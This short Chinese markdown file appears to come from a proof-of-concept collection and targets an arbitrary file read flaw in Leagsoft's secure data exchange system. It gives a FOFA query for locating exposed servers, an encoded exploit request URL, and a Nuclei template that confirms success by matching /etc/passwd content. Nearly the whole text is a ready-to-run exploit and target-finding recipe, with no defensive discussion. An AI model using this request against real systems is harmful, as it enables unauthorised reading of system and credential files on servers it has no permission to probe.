联软安全数据交换系统任意文件读取.md

联软安全数据交换系统任意文件读取

fofa

body="UniExServices"

poc

/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=

nuclei

id: leagsoft-safedata-exchange-file-fileread

info:
  name: 联软安全数据交换系统任意文件读取
  author: mmy
  severity: high
  tags: leagsoft,fileread
  description: 联软安全数据交换系统任意文件读取
  reference:
    - 
  metadata: 
    fofa-query: 'body="UniExServices"'
    verified: true
    max-request: 1

http:
  - method: GET
    path:
      - "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="

    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"